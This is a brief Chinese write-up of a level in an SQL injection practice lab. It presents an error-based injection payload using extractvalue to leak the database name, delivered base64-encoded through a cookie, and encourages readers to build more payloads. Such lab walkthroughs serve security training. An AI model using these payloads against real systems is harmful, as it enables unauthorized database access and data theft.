标签:
本关和less20、less21是一致的,我们可以从源代码中看到这里对uname进行了"uname"的处理,可以构造payload:
admin1"and extractvalue(1,concat(0x7e,(select database()),0x7e))#
Payload进行base64编码后,修改cookie再进行提交
可以看到数据库名为security
其他的payload请自行发散思维进行构造。
标签:
原文地址:http://www.cnblogs.com/lcamry/p/5763016.html